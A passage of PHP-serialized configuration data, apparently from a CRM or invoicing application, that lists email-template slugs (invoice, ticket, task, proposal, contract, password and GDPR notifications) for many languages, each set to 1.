ayment-succeeded-polish\";i:1;s:35:\"contract-expiration-to-staff-polish\";i:1;s:27:\"gdpr-removal-request-polish\";i:1;s:32:\"gdpr-removal-request-lead-polish\";i:1;s:36:\"client-registration-confirmed-polish\";i:1;s:31:\"contract-signed-to-staff-polish\";i:1;s:35:\"customer-subscribed-to-staff-polish\";i:1;s:33:\"contact-verification-email-polish\";i:1;s:50:\"new-customer-profile-file-uploaded-to-staff-polish\";i:1;s:34:\"event-notification-to-staff-polish\";i:1;s:43:\"subscription-payment-requires-action-polish\";i:1;s:25:\"invoice-due-notice-polish\";i:1;s:42:\"estimate-request-submitted-to-staff-polish\";i:1;s:32:\"estimate-request-assigned-polish\";i:1;s:40:\"estimate-request-received-to-user-polish\";i:1;s:28:\"new-client-created-ukrainian\";i:1;s:32:\"invoice-send-to-client-ukrainian\";i:1;s:33:\"new-ticket-opened-admin-ukrainian\";i:1;s:22:\"ticket-reply-ukrainian\";i:1;s:29:\"ticket-autoresponse-ukrainian\";i:1;s:34:\"invoice-payment-recorded-ukrainian\";i:1;s:32:\"invoice-overdue-notice-ukrainian\";i:1;s:30:\"invoice-already-send-ukrainian\";i:1;s:34:\"new-ticket-created-staff-ukrainian\";i:1;s:33:\"estimate-send-to-client-ukrainian\";i:1;s:31:\"ticket-reply-to-admin-ukrainian\";i:1;s:31:\"estimate-already-send-ukrainian\";i:1;s:29:\"contract-expiration-ukrainian\";i:1;s:23:\"task-assigned-ukrainian\";i:1;s:32:\"task-added-as-follower-ukrainian\";i:1;s:24:\"task-commented-ukrainian\";i:1;s:31:\"task-added-attachment-ukrainian\";i:1;s:36:\"estimate-declined-to-staff-ukrainian\";i:1;s:36:\"estimate-accepted-to-staff-ukrainian\";i:1;s:34:\"proposal-client-accepted-ukrainian\";i:1;s:35:\"proposal-send-to-customer-ukrainian\";i:1;s:34:\"proposal-client-declined-ukrainian\";i:1;s:35:\"proposal-client-thank-you-ukrainian\";i:1;s:36:\"proposal-comment-to-client-ukrainian\";i:1;s:35:\"proposal-comment-to-admin-ukrainian\";i:1;s:40:\"estimate-thank-you-to-customer-ukrainian\";i:1;s:36:\"task-deadline-notification-ukrainian\";i:1;s:23:\"send-contract-ukrainian\";i:1;s:43:\"invoice-payment-recorded-to-staff-ukrainian\";i:1;s:27:\"auto-close-ticket-ukrainian\";i:1;s:49:\"new-project-discussion-created-to-staff-ukrainian\";i:1;s:52:\"new-project-discussion-created-to-customer-ukrainian\";i:1;s:47:\"new-project-file-uploaded-to-customer-ukrainian\";i:1;s:44:\"new-project-file-uploaded-to-staff-ukrainian\";i:1;s:52:\"new-project-discussion-comment-to-customer-ukrainian\";i:1;s:49:\"new-project-discussion-comment-to-staff-ukrainian\";i:1;s:39:\"staff-added-as-project-member-ukrainian\";i:1;s:34:\"estimate-expiry-reminder-ukrainian\";i:1;s:34:\"proposal-expiry-reminder-ukrainian\";i:1;s:27:\"new-staff-created-ukrainian\";i:1;s:33:\"contact-forgot-password-ukrainian\";i:1;s:34:\"contact-password-reseted-ukrainian\";i:1;s:30:\"contact-set-password-ukrainian\";i:1;s:31:\"staff-forgot-password-ukrainian\";i:1;s:32:\"staff-password-reseted-ukrainian\";i:1;s:29:\"assigned-to-project-ukrainian\";i:1;s:43:\"task-added-attachment-to-contacts-ukrainian\";i:1;s:36:\"task-commented-to-contacts-ukrainian\";i:1;s:27:\"new-lead-assigned-ukrainian\";i:1;s:26:\"client-statement-ukrainian\";i:1;s:34:\"ticket-assigned-to-admin-ukrainian\";i:1;s:40:\"new-client-registered-to-admin-ukrainian\";i:1;s:40:\"new-web-to-lead-form-submitted-ukrainian\";i:1;s:35:\"two-factor-authentication-ukrainian\";i:1;s:38:\"project-finished-to-customer-ukrainian\";i:1;s:36:\"credit-note-send-to-client-ukrainian\";i:1;s:37:\"task-status-change-to-staff-ukrainian\";i:1;s:40:\"task-status-change-to-contacts-ukrainian\";i:1;s:30:\"reminder-email-staff-ukrainian\";i:1;s:36:\"contract-comment-to-client-ukrainian\";i:1;s:35:\"contract-comment-to-admin-ukrainian\";i:1;s:27:\"send-subscription-ukrainian\";i:1;s:37:\"subscription-payment-failed-ukrainian\";i:1;s:31:\"subscription-canceled-ukrainian\";i:1;s:40:\"subscription-payment-succeeded-ukrainian\";i:1;s:38:\"contract-expiration-to-staff-ukrainian\";i:1;s:30:\"gdpr-removal-request-ukrainian\";i:1;s:35:\"gdpr-removal-request-lead-ukrainian\";i:1;s:39:\"client-registration-confirmed-ukrainian\";i:1;s:34:\"contract-signed-to-staff-ukrainian\";i:1;s:38:\"customer-subscribed-to-staff-ukrainian\";i:1;s:36:\"contact-verification-email-ukrainian\";i:1;s:53:\"new-customer-profile-file-uploaded-to-staff-ukrainian\";i:1;s:37:\"event-notification-to-staff-ukrainian\";i:1;s:46:\"subscription-payment-requires-action-ukrainian\";i:1;s:28:\"invoice-due-notice-ukrainian\";i:1;s:45:\"estimate-request-submitted-to-staff-ukrainian\";i:1;s:35:\"estimate-request-assigned-ukrainian\";i:1;s:43:\"estimate-request-received-to-user-ukrainian\";i:1;s:26:\"new-client-created-persian\";i:1;s:30:\"invoice-send-to-client-persian\";i:1;s:31:\"new-ticket-opened-admin-persian\";i:1;s:20:\"ticket-reply-persian\";i:1;s:27:\"ticket-autoresponse-persian\";i:1;s:32:\"invoice-payment-recorded-persian\";i:1;s:30:\"invoice-overdue-notice-persian\";i:1;s:28:\"invoice-already-send-persian\";i:1;s:32:\"new-ticket-created-staff-persian\";i:1;s:31:\"estimate-send-to-client-persian\";i:1;s:29:\"ticket-reply-to-admin-persian\";i:1;s:29:\"estimate-already-send-persian\";i:1;s:27:\"contract-expiration-persian\";i:1;s:21:\"task-assigned-persian\";i:1;s:30:\"task-added-as-follower-persian\";i:1;s:22:\"task-commented-persian\";i:1;s:29:\"task-added-attachment-persian\";i:1;s:34:\"estimate-declined-to-staff-persian\";i:1;s:34:\"estimate-accepted-to-staff-persian\";i:1;s:32:\"proposal-client-accepted-persian\";i:1;s:33:\"proposal-send-to-customer-persian\";i:1;s:32:\"proposal-client-declined-persian\";i:1;s:33:\"proposal-client-thank-you-persian\";i:1;s:34:\"proposal-comment-to-client-persian\";i:1;s:33:\"proposal-comment-to-admin-persian\";i:1;s:38:\"estimate-thank-you-to-customer-persian\";i:1;s:34:\"task-deadline-notification-persian\";i:1;s:21:\"send-contract-persian\";i:1;s:41:\"invoice-payment-recorded-to-staff-persian\";i:1;s:25:\"auto-close-ticket-persian\";i:1;s:47:\"new-project-discussion-created-to-staff-persian\";i:1;s:50:\"new-project-discussion-created-to-customer-persian\";i:1;s:45:\"new-project-file-uploaded-to-customer-persian\";i:1;s:42:\"new-project-file-uploaded-to-staff-persian\";i:1;s:50:\"new-project-discussion-comment-to-customer-persian\";i:1;s:47:\"new-project-discussion-comment-to-staff-persian\";i:1;s:37:\"staff-added-as-project-member-persian\";i:1;s:32:\"estimate-expiry-reminder-persian\";i:1;s:32:\"proposal-expiry-reminder-persian\";i:1;s:25:\"new-staff-created-persian\";i:1;s:31:\"contact-forgot-password-persian\";i:1;s:32:\"contact-password-reseted-persian\";i:1;s:28:\"contact-set-password-persian\";i:1;s:29:\"staff-forgot-password-persian\";i:1;s:30:\"staff-password-reseted-persian\";i:1;s:27:\"assigned-to-project-persian\";i:1;s:41:\"task-added-attachment-to-contacts-persian\";i:1;s:34:\"task-commented-to-contacts-persian\";i:1;s:25:\"new-lead-assigned-persian\";i:1;s:24:\"client-statement-persian\";i:1;s:32:\"ticket-assigned-to-admin-persian\";i:1;s:38:\"new-client-registered-to-admin-persian\";i:1;s:38:\"new-web-to-lead-form-submitted-persian\";i:1;s:33:\"two-factor-authentication-persian\";i:1;s:36:\"project-finished-to-customer-persian\";i:1;s:34:\"credit-note-send-to-client-persian\";i:1;s:35:\"task-status-change-to-staff-persian\";i:1;s:38:\"task-status-change-to-contacts-persian\";i:1;s:28:\"reminder-email-staff-persian\";i:1;s:34:\"contract-comment-to-client-persian\";i:1;s:33:\"contract-comment-to-admin-persian\";i:1;s:25:\"send-subscription-persian\";i:1;s:35:\"subscription-payment-failed-persian\";i:1;s:29:\"subscription-canceled-persian\";i:1;s:38:\"subscription-payment-succeeded-persian\";i:1;s:36:\"contract-expiration-to-staff-persian\";i:1;s:28:\"gdpr-removal-request-persian\";i:1;s:33:\"gdpr-removal-request-lead-persian\";i:1;s:37:\"client-registration-confirmed-persian\";i:1;s:32:\"contract-signed-to-staff-persian\";i:1;s:36:\"customer-subscribed-to-staff-persian\";i:1;s:34:\"contact-verification-email-persian\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-persian\";i:1;s:35:\"event-notification-to-staff-persian\";i:1;s:44:\"subscription-payment-requires-action-persian\";i:1;s:26:\"invoice-due-notice-persian\";i:1;s:43:\"estimate-request-submitted-to-staff-persian\";i:1;s:33:\"estimate-request-assigned-persian\";i:1;s:41:\"estimate-request-received-to-user-persian\";i:1;s:27:\"new-client-created-japanese\";i:1;s:31:\"invoice-send-to-client-japanese\";i:1;s:32:\"new-ticket-opened-admin-japanese\";i:1;s:21:\"ticket-reply-japanese\";i:1;s:28:\"ticket-autoresponse-japanese\";i:1;s:33:\"invoice-payment-recorded-japanese\";i:1;s:31:\"invoice-overdue-notice-japanese\";i:1;s:29:\"invoice-already-send-japanese\";i:1;s:33:\"new-ticket-created-staff-japanese\";i:1;s:32:\"estimate-send-to-client-japanese\";i:1;s:30:\"ticket-reply-to-admin-japanese\";i:1;s:30:\"estimate-already-send-japanese\";i:1;s:28:\"contract-expiration-japanese\";i:1;s:22:\"task-assigned-japanese\";i:1;s:31:\"task-added-as-follower-japanese\";i:1;s:23:\"task-commented-japanese\";i:1;s:30:\"task-added-attachment-japanese\";i:1;s:35:\"estimate-declined-to-staff-japanese\";i:1;s:35:\"estimate-accepted-to-staff-japanese\";i:1;s:33:\"proposal-client-accepted-japanese\";i:1;s:34:\"proposal-send-to-customer-japanese\";i:1;s:33:\"proposal-client-declined-japanese\";i:1;s:34:\"proposal-client-thank-you-japanese\";i:1;s:35:\"proposal-comment-to-client-japanese\";i:1;s:34:\"proposal-comment-to-admin-japanese\";i:1;s:39:\"estimate-thank-you-to-customer-japanese\";i:1;s:35:\"task-deadline-notification-japanese\";i:1;s:22:\"send-contract-japanese\";i:1;s:42:\"invoice-payment-recorded-to-staff-japanese\";i:1;s:26:\"auto-close-ticket-japanese\";i:1;s:48:\"new-project-discussion-created-to-staff-japanese\";i:1;s:51:\"new-project-discussion-created-to-customer-japanese\";i:1;s:46:\"new-project-file-uploaded-to-customer-japanese\";i:1;s:43:\"new-project-file-uploaded-to-staff-japanese\";i:1;s:51:\"new-project-discussion-comment-to-customer-japanese\";i:1;s:48:\"new-project-discussion-comment-to-staff-japanese\";i:1;s:38:\"staff-added-as-project-member-japanese\";i:1;s:33:\"estimate-expiry-reminder-japanese\";i:1;s:33:\"proposal-expiry-reminder-japanese\";i:1;s:26:\"new-staff-created-japanese\";i:1;s:32:\"contact-forgot-password-japanese\";i:1;s:33:\"contact-password-reseted-japanese\";i:1;s:29:\"contact-set-password-japanese\";i:1;s:30:\"staff-forgot-password-japanese\";i:1;s:31:\"staff-password-reseted-japanese\";i:1;s:28:\"assigned-to-project-japanese\";i:1;s:42:\"task-added-attachment-to-contacts-japanese\";i:1;s:35:\"task-commented-to-contacts-japanese\";i:1;s:26:\"new-lead-assigned-japanese\";i:1;s:25:\"client-statement-japanese\";i:1;s:33:\"ticket-assigned-to-admin-japanese\";i:1;s:39:\"new-client-registered-to-admin-japanese\";i:1;s:39:\"new-web-to-lead-form-submitted-japanese\";i:1;s:34:\"two-factor-authentication-japanese\";i:1;s:37:\"project-finished-to-customer-japanese\";i:1;s:35:\"credit-note-send-to-client-japanese\";i:1;s:36:\"task-status-change-to-staff-japanese\";i:1;s:39:\"task-status-change-to-contacts-japanese\";i:1;s:29:\"reminder-email-staff-japanese\";i:1;s:35:\"contract-comment-to-client-japanese\";i:1;s:34:\"contract-comment-to-admin-japanese\";i:1;s:26:\"send-subscription-japanese\";i:1;s:36:\"subscription-payment-failed-japanese\";i:1;s:30:\"subscription-canceled-japanese\";i:1;s:39:\"subscription-payment-succeeded-japanese\";i:1;s:37:\"contract-expiration-to-staff-japanese\";i:1;s:29:\"gdpr-removal-request-japanese\";i:1;s:34:\"gdpr-removal-request-lead-japanese\";i:1;s:38:\"client-registration-confirmed-japanese\";i:1;s:33:\"contract-signed-to-staff-japanese\";i:1;s:37:\"customer-subscribed-to-staff-japanese\";i:1;s:35:\"contact-verification-email-japanese\";i:1;s:52:\"new-customer-profile-file-uploaded-to-staff-japanese\";i:1;s:36:\"event-notification-to-staff-japanese\";i:1;s:45:\"subscription-payment-requires-action-japanese\";i:1;s:27:\"invoice-due-notice-japanese\";i:1;s:44:\"estimate-request-submitted-to-staff-japanese\";i:1;s:34:\"estimate-request-assigned-japanese\";i:1;s:42:\"estimate-request-received-to-user-japanese\";i:1;s:26:\"new-client-created-spanish\";i:1;s:30:\"invoice-send-to-client-spanish\";i:1;s:31:\"new-ticket-opened-admin-spanish\";i:1;s:20:\"ticket-reply-spanish\";i:1;s:27:\"ticket-autoresponse-spanish\";i:1;s:32:\"invoice-payment-recorded-spanish\";i:1;s:30:\"invoice-overdue-notice-spanish\";i:1;s:28:\"invoice-already-send-spanish\";i:1;s:32:\"new-ticket-created-staff-spanish\";i:1;s:31:\"estimate-send-to-client-spanish\";i:1;s:29:\"ticket-reply-to-admin-spanish\";i:1;s:29:\"estimate-already-send-spanish\";i:1;s:27:\"contract-expiration-spanish\";i:1;s:21:\"task-assigned-spanish\";i:1;s:30:\"task-added-as-follower-spanish\";i:1;s:22:\"task-commented-spanish\";i:1;s:29:\"task-added-attachment-spanish\";i:1;s:34:\"estimate-declined-to-staff-spanish\";i:1;s:34:\"estimate-accepted-to-staff-spanish\";i:1;s:32:\"proposal-client-accepted-spanish\";i:1;s:33:\"proposal-send-to-customer-spanish\";i:1;s:32:\"proposal-client-declined-spanish\";i:1;s:33:\"proposal-client-thank-you-spanish\";i:1;s:34:\"proposal-comment-to-client-spanish\";i:1;s:33:\"proposal-comment-to-admin-spanish\";i:1;s:38:\"estimate-thank-you-to-customer-spanish\";i:1;s:34:\"task-deadline-notification-spanish\";i:1;s:21:\"send-contract-spanish\";i:1;s:41:\"invoice-payment-recorded-to-staff-spanish\";i:1;s:25:\"auto-close-ticket-spanish\";i:1;s:47:\"new-project-discussion-created-to-staff-spanish\";i:1;s:50:\"new-project-discussion-created-to-customer-spanish\";i:1;s:45:\"new-project-file-uploaded-to-customer-spanish\";i:1;s:42:\"new-project-file-uploaded-to-staff-spanish\";i:1;s:50:\"new-project-discussion-comment-to-customer-spanish\";i:1;s:47:\"new-project-discussion-comment-to-staff-spanish\";i:1;s:37:\"staff-added-as-project-member-spanish\";i:1;s:32:\"estimate-expiry-reminder-spanish\";i:1;s:32:\"proposal-expiry-reminder-spanish\";i:1;s:25:\"new-staff-created-spanish\";i:1;s:31:\"contact-forgot-password-spanish\";i:1;s:32:\"contact-password-reseted-spanish\";i:1;s:28:\"contact-set-password-spanish\";i:1;s:29:\"staff-forgot-password-spanish\";i:1;s:30:\"staff-password-reseted-spanish\";i:1;s:27:\"assigned-to-project-spanish\";i:1;s:41:\"task-added-attachment-to-contacts-spanish\";i:1;s:34:\"task-commented-to-contacts-spanish\";i:1;s:25:\"new-lead-assigned-spanish\";i:1;s:24:\"client-statement-spanish\";i:1;s:32:\"ticket-assigned-to-admin-spanish\";i:1;s:38:\"new-client-registered-to-admin-spanish\";i:1;s:38:\"new-web-to-lead-form-submitted-spanish\";i:1;s:33:\"two-factor-authentication-spanish\";i:1;s:36:\"project-finished-to-customer-spanish\";i:1;s:34:\"credit-note-send-to-client-spanish\";i:1;s:35:\"task-status-change-to-staff-spanish\";i:1;s:38:\"task-status-change-to-contacts-spanish\";i:1;s:28:\"reminder-email-staff-spanish\";i:1;s:34:\"contract-comment-to-client-spanish\";i:1;s:33:\"contract-comment-to-admin-spanish\";i:1;s:25:\"send-subscription-spanish\";i:1;s:35:\"subscription-payment-failed-spanish\";i:1;s:29:\"subscription-canceled-spanish\";i:1;s:38:\"subscription-payment-succeeded-spanish\";i:1;s:36:\"contract-expiration-to-staff-spanish\";i:1;s:28:\"gdpr-removal-request-spanish\";i:1;s:33:\"gdpr-removal-request-lead-spanish\";i:1;s:37:\"client-registration-confirmed-spanish\";i:1;s:32:\"contract-signed-to-staff-spanish\";i:1;s:36:\"customer-subscribed-to-staff-spanish\";i:1;s:34:\"contact-verification-email-spanish\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-spanish\";i:1;s:35:\"event-notification-to-staff-spanish\";i:1;s:44:\"subscription-payment-requires-action-spanish\";i:1;s:26:\"invoice-due-notice-spanish\";i:1;s:43:\"estimate-request-submitted-to-staff-spanish\";i:1;s:33:\"estimate-request-assigned-spanish\";i:1;s:41:\"estimate-request-received-to-user-spanish\";i:1;s:26:\"new-client-created-italian\";i:1;s:30:\"invoice-send-to-client-italian\";i:1;s:31:\"new-ticket-opened-admin-italian\";i:1;s:20:\"ticket-reply-italian\";i:1;s:27:\"ticket-autoresponse-italian\";i:1;s:32:\"invoice-payment-recorded-italian\";i:1;s:30:\"invoice-overdue-notice-italian\";i:1;s:28:\"invoice-already-send-italian\";i:1;s:32:\"new-ticket-created-staff-italian\";i:1;s:31:\"estimate-send-to-client-italian\";i:1;s:29:\"ticket-reply-to-admin-italian\";i:1;s:29:\"estimate-already-send-italian\";i:1;s:27:\"contract-expiration-italian\";i:1;s:21:\"task-assigned-italian\";i:1;s:30:\"task-added-as-follower-italian\";i:1;s:22:\"task-commented-italian\";i:1;s:29:\"task-added-attachment-italian\";i:1;s:34:\"estimate-declined-to-staff-italian\";i:1;s:34:\"estimate-accepted-to-staff-italian\";i:1;s:32:\"proposal-client-accepted-italian\";i:1;s:33:\"proposal-send-to-customer-italian\";i:1;s:32:\"proposal-client-declined-italian\";i:1;s:33:\"proposal-client-thank-you-italian\";i:1;s:34:\"proposal-comment-to-client-italian\";i:1;s:33:\"proposal-comment-to-admin-italian\";i:1;s:38:\"estimate-thank-you-to-customer-italian\";i:1;s:34:\"task-deadline-notification-italian\";i:1;s:21:\"send-contract-italian\";i:1;s:41:\"invoice-payment-recorded-to-staff-italian\";i:1;s:25:\"auto-close-ticket-italian\";i:1;s:47:\"new-project-discussion-created-to-staff-italian\";i:1;s:50:\"new-project-discussion-created-to-customer-italian\";i:1;s:45:\"new-project-file-uploaded-to-customer-italian\";i:1;s:42:\"new-project-file-uploaded-to-staff-italian\";i:1;s:50:\"new-project-discussion-comment-to-customer-italian\";i:1;s:47:\"new-project-discussion-comment-to-staff-italian\";i:1;s:37:\"staff-added-as-project-member-italian\";i:1;s:32:\"estimate-expiry-reminder-italian\";i:1;s:32:\"proposal-expiry-reminder-italian\";i:1;s:25:\"new-staff-created-italian\";i:1;s:31:\"contact-forgot-password-italian\";i:1;s:32:\"contact-password-reseted-italian\";i:1;s:28:\"contact-set-password-italian\";i:1;s:29:\"staff-forgot-password-italian\";i:1;s:30:\"staff-password-reseted-italian\";i:1;s:27:\"assigned-to-project-italian\";i:1;s:41:\"task-added-attachment-to-contacts-italian\";i:1;s:34:\"task-commented-to-contacts-italian\";i:1;s:25:\"new-lead-assigned-italian\";i:1;s:24:\"client-statement-italian\";i:1;s:32:\"ticket-assigned-to-admin-italian\";i:1;s:38:\"new-client-registered-to-admin-italian\";i:1;s:38:\"new-web-to-lead-form-submitted-italian\";i:1;s:33:\"two-factor-authentication-italian\";i:1;s:36:\"project-finished-to-customer-italian\";i:1;s:34:\"credit-note-send-to-client-italian\";i:1;s:35:\"task-status-change-to-staff-italian\";i:1;s:38:\"task-status-change-to-contacts-italian\";i:1;s:28:\"reminder-email-staff-italian\";i:1;s:34:\"contract-comment-to-client-italian\";i:1;s:33:\"contract-comment-to-admin-italian\";i:1;s:25:\"send-subscription-italian\";i:1;s:35:\"subscription-payment-failed-italian\";i:1;s:29:\"subscription-canceled-italian\";i:1;s:38:\"subscription-payment-succeeded-italian\";i:1;s:36:\"contract-expiration-to-staff-italian\";i:1;s:28:\"gdpr-removal-request-italian\";i:1;s:33:\"gdpr-removal-request-lead-italian\";i:1;s:37:\"client-registration-confirmed-italian\";i:1;s:32:\"contract-signed-to-staff-italian\";i:1;s:36:\"customer-subscribed-to-staff-italian\";i:1;s:34:\"contact-verification-email-italian\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-italian\";i:1;s:35:\"event-notification-to-staff-italian\";i:1;s:44:\"subscription-payment-requires-action-italian\";i:1;s:26:\"invoice-due-notice-italian\";i:1;s:43:\"estimate-request-submitted-to-staff-italian\";i:1;s:33:\"estimate-request-assigned-italian\";i:1;s:41:\"estimate-request-received-to-user-italian\";i:1;s:25:\"new-client-created-slovak\";i:1;s:29:\"invoice-send-to-client-slovak\";i:1;s:30:\"new-ticket-opened-admin-slovak\";i:1;s:19:\"ticket-reply-slovak\";i:1;s:26:\"ticket-autoresponse-slovak\";i:1;s:31:\"invoice-payment-recorded-slovak\";i:1;s:29:\"invoice-overdue-notice-slovak\";i:1;s:27:\"invoice-already-send-slovak\";i:1;s:31:\"new-ticket-created-staff-slovak\";i:1;s:30:\"estimate-send-to-client-slovak\";i:1;s:28:\"ticket-reply-to-admin-slovak\";i:1;s:28:\"estimate-already-send-slovak\";i:1;s:26:\"contract-expiration-slovak\";i:1;s:20:\"task-assigned-slovak\";i:1;s:29:\"task-added-as-follower-slovak\";i:1;s:21:\"task-commented-slovak\";i:1;s:28:\"task-added-attachment-slovak\";i:1;s:33:\"estimate-declined-to-staff-slovak\";i:1;s:33:\"estimate-accepted-to-staff-slovak\";i:1;s:31:\"proposal-client-accepted-slovak\";i:1;s:32:\"proposal-send-to-customer-slovak\";i:1;s:31:\"proposal-client-declined-slovak\";i:1;s:32:\"proposal-client-thank-you-slovak\";i:1;s:33:\"proposal-comment-to-client-slovak\";i:1;s:32:\"proposal-comment-to-admin-slovak\";i:1;s:37:\"estimate-thank-you-to-customer-slovak\";i:1;s:33:\"task-deadline-notification-slovak\";i:1;s:20:\"send-contract-slovak\";i:1;s:40:\"invoice-payment-recorded-to-staff-slovak\";i:1;s:24:\"auto-close-ticket-slovak\";i:1;s:46:\"new-project-discussion-created-to-staff-slovak\";i:1;s:49:\"new-project-discussion-created-to-customer-slovak\";i:1;s:44:\"new-project-file-uploaded-to-customer-slovak\";i:1;s:41:\"new-project-file-uploaded-to-staff-slovak\";i:1;s:49:\"new-project-discussion-comment-to-customer-slovak\";i:1;s:46:\"new-project-discussion-comment-to-staff-slovak\";i:1;s:36:\"staff-added-as-project-member-slovak\";i:1;s:31:\"estimate-expiry-reminder-slovak\";i:1;s:31:\"proposal-expiry-reminder-slovak\";i:1;s:24:\"new-staff-created-slovak\";i:1;s:30:\"contact-forgot-password-slovak\";i:1;s:31:\"contact-password-reseted-slovak\";i:1;s:27:\"contact-set-password-slovak\";i:1;s:28:\"staff-forgot-password-slovak\";i:1;s:29:\"staff-password-reseted-slovak\";i:1;s:26:\"assigned-to-project-slovak\";i:1;s:40:\"task-added-attachment-to-contacts-slovak\";i:1;s:33:\"task-commented-to-contacts-slovak\";i:1;s:24:\"new-lead-assigned-slovak\";i:1;s:23:\"client-statement-slovak\";i:1;s:31:\"ticket-assigned-to-admin-slovak\";i:1;s:37:\"new-client-registered-to-admin-slovak\";i:1;s:37:\"new-web-to-lead-form-submitted-slovak\";i:1;s:32:\"two-factor-authentication-slovak\";i:1;s:35:\"project-finished-to-customer-slovak\";i:1;s:33:\"credit-note-send-to-client-slovak\";i:1;s:34:\"task-status-change-to-staff-slovak\";i:1;s:37:\"task-status-change-to-contacts-slovak\";i:1;s:27:\"reminder-email-staff-slovak\";i:1;s:33:\"contract-comment-to-client-slovak\";i:1;s:32:\"contract-comment-to-admin-slovak\";i:1;s:24:\"send-subscription-slovak\";i:1;s:34:\"subscription-payment-failed-slovak\";i:1;s:28:\"subscription-canceled-slovak\";i:1;s:37:\"subscription-payment-succeeded-slovak\";i:1;s:35:\"contract-expiration-to-staff-slovak\";i:1;s:27:\"gdpr-removal-request-slovak\";i:1;s:32:\"gdpr-removal-request-lead-slovak\";i:1;s:36:\"client-registration-confirmed-slovak\";i:1;s:31:\"contract-signed-to-staff-slovak\";i:1;s:35:\"customer-subscribed-to-staff-slovak\";i:1;s:33:\"contact-verification-email-slovak\";i:1;s:50:\"new-customer-profile-file-uploaded-to-staff-slovak\";i:1;s:34:\"event-notification-to-staff-slovak\";i:1;s:43:\"subscription-payment-requires-action-slovak\";i:1;s:25:\"invoice-due-notice-slovak\";i:1;s:42:\"estimate-request-submitted-to-staff-slovak\";i:1;s:32:\"estimate-request-assigned-slovak\";i:1;s:40:\"estimate-request-received-to-user-slovak\";i:1;s:32:\"new-client-created-portuguese_br\";i:1;s:36:\"invoice-send-to-client-portuguese_br\";i:1;s:37:\"new-ticket-opened-admin-portuguese_br\";i:1;s:26:\"ticket-reply-portuguese_br\";i:1;s:33:\"ticket-autoresponse-portuguese_br\";i:1;s:38:\"invoice-payment-recorded-portuguese_br\";i:1;s:36:\"invoice-overdue-notice-portuguese_br\";i:1;s:34:\"invoice-already-send-portuguese_br\";i:1;s:38:\"new-ticket-created-staff-portuguese_br\";i:1;s:37:\"estimate-send-to-client-portuguese_br\";i:1;s:35:\"ticket-reply-to-admin-portuguese_br\";i:1;s:35:\"estimate-already-send-portuguese_br\";i:1;s:33:\"contract-expiration-portuguese_br\";i:1;s:27:\"task-assigned-portuguese_br\";i:1;s:36:\"task-added-as-follower-portuguese_br\";i:1;s:28:\"task-commented-portuguese_br\";i:1;s:35:\"task-added-attachment-portuguese_br\";i:1;s:40:\"estimate-declined-to-staff-portuguese_br\";i:1;s:40:\"estimate-accepted-to-staff-portuguese_br\";i:1;s:38:\"proposal-client-accepted-portuguese_br\";i:1;s:39:\"proposal-send-to-customer-portuguese_br\";i:1;s:38:\"proposal-client-declined-portuguese_br\";i:1;s:39:\"proposal-client-thank-you-portuguese_br\";i:1;s:40:\"proposal-comment-to-client-portuguese_br\";i:1;s:39:\"proposal-comment-to-admin-portuguese_br\";i:1;s:44:\"estimate-thank-you-to-customer-portuguese_br\";i:1;s:40:\"task-deadline-notification-portuguese_br\";i:1;s:27:\"send-contract-portuguese_br\";i:1;s:47:\"invoice-payment-recorded-to-staff-portuguese_br\";i:1;s:31:\"auto-close-ticket-portuguese_br\";i:1;s:53:\"new-project-discussion-created-to-staff-portuguese_br\";i:1;s:56:\"new-project-discussion-created-to-customer-portuguese_br\";i:1;s:51:\"new-project-file-uploaded-to-customer-portuguese_br\";i:1;s:48:\"new-project-file-uploaded-to-staff-portuguese_br\";i:1;s:56:\"new-project-discussion-comment-to-customer-portuguese_br\";i:1;s:53:\"new-project-discussion-comment-to-staff-portuguese_br\";i:1;s:43:\"staff-added-as-project-member-portuguese_br\";i:1;s:38:\"estimate-expiry-reminder-portuguese_br\";i:1;s:38:\"proposal-expiry-reminder-portuguese_br\";i:1;s:31:\"new-staff-created-portuguese_br\";i:1;s:37:\"contact-forgot-password-portuguese_br\";i:1;s:38:\"contact-password-reseted-portuguese_br\";i:1;s:34:\"contact-set-password-portuguese_br\";i:1;s:35:\"staff-forgot-password-portuguese_br\";i:1;s:36:\"staff-password-reseted-portuguese_br\";i:1;s:33:\"assigned-to-project-portuguese_br\";i:1;s:47:\"task-added-attachment-to-contacts-portuguese_br\";i:1;s:40:\"task-commented-to-contacts-portuguese_br\";i:1;s:31:\"new-lead-assigned-portuguese_br\";i:1;s:30:\"client-statement-portuguese_br\";i:1;s:38:\"ticket-assigned-to-admin-portuguese_br\";i:1;s:44:\"new-client-registered-to-admin-portuguese_br\";i:1;s:44:\"new-web-to-lead-form-submitted-portuguese_br\";i:1;s:39:\"two-factor-authentication-portuguese_br\";i:1;s:42:\"project-finished-to-customer-portuguese_br\";i:1;s:40:\"credit-note-send-to-client-portuguese_br\";i:1;s:41:\"task-status-change-to-staff-portuguese_br\";i:1;s:44:\"task-status-change-to-contacts-portuguese_br\";i:1;s:34:\"reminder-email-staff-portuguese_br\";i:1;s:40:\"contract-comment-to-client-portuguese_br\";i:1;s:39:\"contract-comment-to-admin-portuguese_br\";i:1;s:31:\"send-subscription-portuguese_br\";i:1;s:41:\"subscription-payment-failed-portuguese_br\";i:1;s:35:\"subscription-canceled-portuguese_br\";i:1;s:44:\"subscription-payment-succeeded-portuguese_br\";i:1;s:42:\"contract-expiration-to-staff-portuguese_br\";i:1;s:34:\"gdpr-removal-request-portuguese_br\";i:1;s:39:\"gdpr-removal-request-lead-portuguese_br\";i:1;s:43:\"client-registration-confirmed-portuguese_br\";i:1;s:38:\"contract-signed-to-staff-portuguese_br\";i:1;s:42:\"customer-subscribed-to-staff-portuguese_br\";i:1;s:40:\"contact-verification-email-portuguese_br\";i:1;s:57:\"new-customer-profile-file-uploaded-to-staff-portuguese_br\";i:1;s:41:\"event-notification-to-staff-portuguese_br\";i:1;s:50:\"subscription-payment-requires-action-portuguese_br\";i:1;s:32:\"invoice-due-notice-portuguese_br\";i:1;s:49:\"estimate-request-submitted-to-staff-portuguese_br\";i:1;s:39:\"estimate-request-assigned-portuguese_br\";i:1;s:47:\"estimate-request-received-to-user-portuguese_br\";i:1;s:34:\"inventory-warning-to-staff-swedish\";i:1;s:37:\"inventory-warning-to-staff-portuguese\";i:1;s:34:\"inventory-warning-to-staff-turkish\";i:1;s:36:\"inventory-warning-to-staff-bulgarian\";i:1;s:32:\"inventory-warning-to-staff-dutch\";i:1;s:34:\"inventory-warning-to-staff-russian\";i:1;s:32:\"inventory-warning-to-staff-greek\";i:1